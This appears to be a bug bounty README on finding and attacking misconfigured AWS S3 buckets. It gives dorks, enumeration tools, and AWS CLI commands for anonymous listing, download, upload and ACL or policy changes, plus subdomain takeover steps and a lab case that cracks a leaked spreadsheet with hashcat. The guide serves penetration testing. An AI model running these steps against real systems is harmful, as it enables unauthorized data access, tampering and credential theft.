Skip to content

ex16x41/bugbounty

Repository files navigation

Cloud AWS hacking (Public Repository)

You can use this s3 hacking guide for your own work - I tested everything and organized how I like it and how it makes sense to me from workflow pov

OSINT & Active Methods to Identify AWS s3 of a Target IP / COMANY / DOMAIN

Method Detail (if available)
Weppalyzer Identify technologies on target web
HTML inspection, CSS & JS, files, comments e.g., " img src="https://s3.amazonaws.com/my-bucket/my-image.jpg" alt="My Image">" you can also use linkfinder to find endpoints/hyperlinks or use linkgopher
Network requests When a webpage loads, it may make network requests to an S3 bucket to fetch resources such as images, videos, or other files. You can use your browser's developer tools to monitor network requests and look for requests to S3 bucket URLs.
Cookies Some websites may use cookies to store S3 bucket URLs or other sensitive information. You can inspect the cookies of a website using your browser's developer tools or a browser extension such as EditThisCookie.
Configuration files If the website is built using a framework or content management system (CMS), it may store S3 bucket URLs or other configuration settings in configuration files such as config.php or settings.ini
enum via Tools on GitHub Lazy S3, bucket_finder, AWS Cred Scanner, sandcastle, Mass3, Dumpster Diver, S3 Bucket Finder, S3Scanner
other tools to enum s3 https://github.com/sa7mon/S3Scanner , https://github.com/clario-tech/s3-inspector , https://github.com/jordanpotti/AWSBucketDump (Contains a list with potential bucket names) , https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets , https://github.com/smaranchand/bucky , https://github.com/tomdev/teh_s3_bucketeers , https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3 , https://github.com/Eilonh/s3crets_scanner , https://github.com/belane/CloudHunter
Content-Security-Policy Response headers *
Burp Suite spider > go trough resulst
dig -x target domain or IP will result in s3-site-us-east-1.amazonaws.com
https://osint.sh/buckets/ a little better than grayhat because not limited to filtering by filetype (no reg req)
https://buckets.grayhatwarfare.com/ *
Google dorks site:http://s3.amazonaws.com intitle:index.of.bucket, site:http://amazonaws.com inurl:".s3.amazonaws.com/", site:.s3.amazonaws.com "Company" intitle:index.of.bucket, site:http://s3.amazonaws.com intitle:Bucket loading , site:*.amazonaws.com inurl:index.html, Bucket Date Modified

Visual Examples of all methods above to identify s3 buckets (how it looks like in practice)

Weppalyzer image

view source code (S3 Bucket URL hardcoded in HTML of webpage also... in IP addresses too, not only www.domain.com format)

image

inspect network traffic - see server GET requests (can filter keyword as per usual url formats)

image

s3 in robots.txt (or generally ext:txt)

image

.json files

image

Google dorking

image

using LeakIX premium plugins + query leaks find buckets + access keys

image

shoan or censys , fofa, zoomeye with similar query, changed region

image

What actions can we do on s3 ?

Enumeration: use AWS CLI commands like aws s3 ls or aws s3api list-objects to enumerate the contents of your bucket and gather information about the exposed files and directories.

Access and Download: If  S3 bucket has public read access, we can use AWS CLI commands such as aws s3 cp or aws s3 sync to download the files from the bucket to their local system.

Upload or Modify Objects: If the bucket has public write access or allows unauthorized uploads, we may use commands like aws s3 cp or aws s3 sync to upload malicious files, overwrite existing files, or modify the content within the bucket.

Bucket and Object Deletion: In cases where the bucket has misconfigured or weak access control, we might attempt to delete or remove objects from the bucket using commands like aws s3 rm.

ACL and Policy Modification: If the bucket's access control settings are misconfigured, we may use AWS CLI commands like aws s3api put-bucket-acl or aws s3api put-bucket-policy to modify the access control lists (ACLs) or bucket policies, granting themselves or others unauthorized access.

First let's understand how s3 buckets look like in real life? we have multiple scenarios

example URL one (here the url format is targetbucket.amazon) here to read bucket we would do s3://divvy-tripdata

image

example URL two (here the url format is amazon.targetbucket) here to read bucket we would do s3://capitalbikeshare-data

image

example URL three (here the domain is not revealing the bucket directly, but instead under name tags that differ) here to read bucket we would do s3://dpa-prd

image

example URL four (here the name of the subdomain and bucket name match) here to read bucket we would do s3://flaws-cloud

image

Interesting file types to look for in s3

filetype
PS1
XML
TXT
CSV
XLSX

visual example of files (filetypes) in bucket

image

Gathered some real life case scenarios of aws s3 attacks

from nosuchkey to full listing of bucket

access from web gives "nosuchkey", but with --no-sign-request it works image image

find access keys in file in bucket, authenticate, escalate

find file with admin creds, login, access further folders/files that were otherwise restricted found admin keys

image

aws configure (auth with admin keys)

image

ls admin folder + contents (that wasnt accessible as --no-sign-request)

image

404 no such bucket to subdomain takeover

developer delete s3 bucket but not delete cname pointing to that s3 bucket

image

use this https://github.com/EdOverflow/can-i-take-over-xyz?source=post_page-----81a68823af74--------------------------------

Go to S3 panel
Click Create Bucket
Set Bucket name to source domain name (i.e., the domain you want to take over from error)
Click Next multiple times to finish
Open the created bucket
Click Upload
Select the file which will be used for PoC (HTML or TXT file). I recommend naming it differently than index.html; you can use poc (without extension)
In Permissions tab select Grant public read access to this object(s)
After upload, select the file and click More -> Change metadata
Click Add metadata, select Content-Type and value should reflect the type of document. If HTML, choose text/html, etc.
(Optional) If the bucket was configured as a website
Switch to Properties tab
Click Static website hosting
Select Use this bucket to host a website
As an index, choose the file that you uploaded
Click Save

exploit EBS snapshots by AWS acc ID

https://github.com/WeAreCloudar/s3-account-search/

issue the command python3 -m pip install s3-account-search to install the tool s3-account-search. Next we need to provide the Amazon Resource Name (ARN) of the role under our control (i.e. in our own AWS account), as well as a target S3 bucket in the AWS account whose ID we want to enumerate.

image

writeable (upload malicious poc file)

image

from ID get access keys

image

TO ADD: IAM abuse cases add from https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum + https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools

AWS CLI IAM Enumeration & Exploitation Commands

Command Detail (if available)
* *
* *
* *

AWS CLI ID Exploitation Commands (Get Keys)

Command Detail (if available)
* *
* *
* *

Now let's see how configurations look like form the inside of the aws console (and what leads to abuse of them)

Notes
If internally the bucket permissions enabled only to AWS users then cannot use --no-sign-request (will not work, must use creds config'd in cli)

image

image

Notes
with --no-sign-request does not work because of configuration

image

Notes
this one is used to enumerate the contents of your bucket and gather information about the exposed files and directories.

image

Notes
If internally the bucket permissions enabled only to everyone (all public) users then can use --no-sign-request and with creds also

image

Notes
The actions and commands that are successfully executed epend entirely on the configuration of permissions, for example this setting is configured to everyone allowed to list but not read ACP, this is why when attempting a read of acp (policy) we dont get access

image

More inside view of poor configurations or possible configurations

image

image

image

image

image

image

commands to run tests with

list contents of bucket aws s3 ls s3://bucket --no-sign-request

recsuisively list files aws s3 ls s3://bucket --no-sign-request --recursive

download files test aws s3 cp s3://bucket/folder/file . --no-sign-request

upload file test permissions aws s3 cp localfile s3://[name_of_bucket]/test_file.txt –-no-sign-request

to list dirs close with /dir/

good to test --recrusive if there is folder forbidden for ls

curl -I https://s3.amazonaws.com/bucket - this will show region configured in this bucket

Identify overly permissive policies (e.g., Action set to "*")

If you go to URL to see bucket content at root domain like bucket.amazon.com/ (ensure there is no double // because that will show 'nosuchbucket')

Read access control list

At bucket, level allows to read the bucket’s Access Control List and at the object level allows to read the object’s Access Control List. Read ACL can be tested with the AWS command line using the following command

aws s3api get-bucket-acl --bucket [bucketname] --no-sign

aws s3api get-object-acl --bucket [bucketname] --key index.html --no-sign-request

notes: some buckets will allow ls using --no-sign-request but will not allow download of files from it (forbidden)

CASE SCENARIOS

CASE 1

Found IP, this IP from nmap has open port 3000 with description node js express framework, you access via web on this port and see there is site come up, this site in source code shows bucket, you try to access bucket using "aws s3 cp s3://hugelogistics-data" but it doesnt work, you try with "--no-sign-request" it does not work, We might think to just download all the files from the bucket using aws s3 cp s3://hugelogistics-data . --recursive , but this also fails. we then can shift into looking at ACL of the bucket, so we run aws s3api get-bucket-acl --bucket hugelogistics-data, but that fails too. We then want to check if instead of ACL we can try policy, so we run aws s3api get-bucket-policy --bucket hugelogistics-data - and successfully so we get: image This bucket policy can be summarized as follows: Any authenticated AWS user globally can access the ACL and the content of the two specified files (backup.xlsx and background.png) in the hugelogistics-data bucket. They can also retrieve the policy of the hugelogistics-data bucket. Even though we weren't able to list the contents of the bucket, we're still able to leak the contents and access them! Let's transfer the Excel file locally. we can run this command to download the file exposed from policy to see if it will have more data for us to pivot from using, aws s3 cp s3://hugelogistics-data/backup.xlsx . - > Attempting to open this in LibreOffice or Microsoft Office we're prompted to enter a password. Let's see if we can crack it. First download the Python script office2john.py . wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/office2john.py This script takes an Office file as input and creates a hash taking into account the version of the office document. generate a hash of the document that we can subject to an offline brute force attack using this command python3 office2john.py backup.xlsx > hash.txt - Remove the filename backup.xlsx: from the hash and save it. Running the command below we crack the password for the spreadsheet in under two minutes! hashcat -a 0 -m 9600 hash.txt rockyou.txt image Opening the XSLX file we see table of creds image this one here mentions CRM.. what makes sense is to go back to site and bruteforce dis on the IP:port for any other logins that unique to CRM based access and use these creds image image image

About

always updating

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published